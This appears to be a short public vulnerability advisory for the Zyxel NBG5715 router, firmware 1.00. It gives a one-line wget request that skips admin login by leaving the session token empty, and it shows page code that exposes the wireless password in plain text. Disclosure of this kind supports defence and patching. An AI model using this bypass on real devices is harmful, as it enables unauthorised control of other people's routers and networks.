================================================================================================== | | __| | _ __ __ ____ __ _ __ __ ____ __ _ __ __ ____ __ / _` || '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ /| '__|\ \ /\ / /\ \/ / | (_| || | \ V V / > < | | \ V V / > < | | \ V V / > < \__,_||_| \_/\_/ /_/\_\|_| \_/\_/ /_/\_\|_| \_/\_/ /_/\_\ ================================================================================================== Zyxel NBG5715 Simultaneous Dual-Band Wireless N900 Media Router Local admin privileges bypass and Local Wireless Plain Text Password Disclosure Firmware Version Affected: NBG5715_1.00 Release Date: 20 November 2012 Discover: drwxrwxrwx <drwxrwxrwx@linuxmail.org> Vendor: ZyXEL Products Affected: NBG5715 ================================================================================================== VULN: Local admin privileges bypass doing wget 192.168.1.1/cgi-bin/luci/;stok=/easy/networkmap# ================================================================================================== DATA: <title>.::Welcome to ZyXEL NBG5715::.</title> with ( document.forms[0] ){ /* 2.4G */ if(wlanRadio.selectedIndex == 0){ wlanSSID.value = "Defaultssid"; wlanSec.selectedIndex = 2; wlanPwd.value = "thedefaultpassword"; } else{ /* 5G */ wlanSSID.value = "Defaultssid"; wlanSec.selectedIndex = 2; wlanPwd.value = "thedefaultpassword"; } changeSec(); } } ================================================================================================== Gretz